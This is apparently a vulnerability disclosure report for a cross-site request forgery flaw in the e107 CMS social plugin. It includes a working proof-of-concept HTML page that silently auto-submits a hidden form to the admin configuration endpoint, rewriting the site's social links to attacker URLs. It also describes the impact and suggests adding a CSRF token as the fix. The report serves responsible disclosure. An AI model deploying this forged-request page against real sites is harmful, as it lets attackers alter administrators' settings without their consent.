Cross-Site Request Forgery (CSRF) in e107inc/e107
Valid
Reported on
Sep 13th 2021
✍️ Description
Attacker or malicious user is able to change social setting if a logged in user visits attacker website. because lack of CSRF token
🕵️♂️ Proof of Concept
1.when you logged in open this POC.html in a browser
2.you can check unintentionally your facebook page changed to “http://facebook.com/attacker”
//POC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8181/ecms-full/e107_plugins/social/admin_config.php" method="POST">
<input type="hidden" name="xurl[facebook]" value="http://facebook.com/attacker" />
<input type="hidden" name="xurl[twitter]" value="#" />
<input type="hidden" name="xurl[youtube]" value="#" />
<input type="hidden" name="xurl[linkedin]" value="" />
<input type="hidden" name="xurl[github]" value="" />
<input type="hidden" name="xurl[flickr]" value="" />
<input type="hidden" name="xurl[instagram]" value="#" />
<input type="hidden" name="xurl[pinterest]" value="#" />
<input type="hidden" name="xurl[steam]" value="" />
<input type="hidden" name="xurl[vimeo]" value="" />
<input type="hidden" name="xurl[twitch]" value="" />
<input type="hidden" name="xurl[vk]" value="" />
<input type="hidden" name="save_social_pages" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
💥 Impact
This vulnerability is capable of forcing user to unintentional change social settings
💥 Test
Tested version is 2.3 on Firefox and safari.
💥 Fix
You should set a CSRF token on this requeset.
References
We have contacted a member of the
e107inc/e107
team and are waiting to hear back
2 years ago
to join this conversation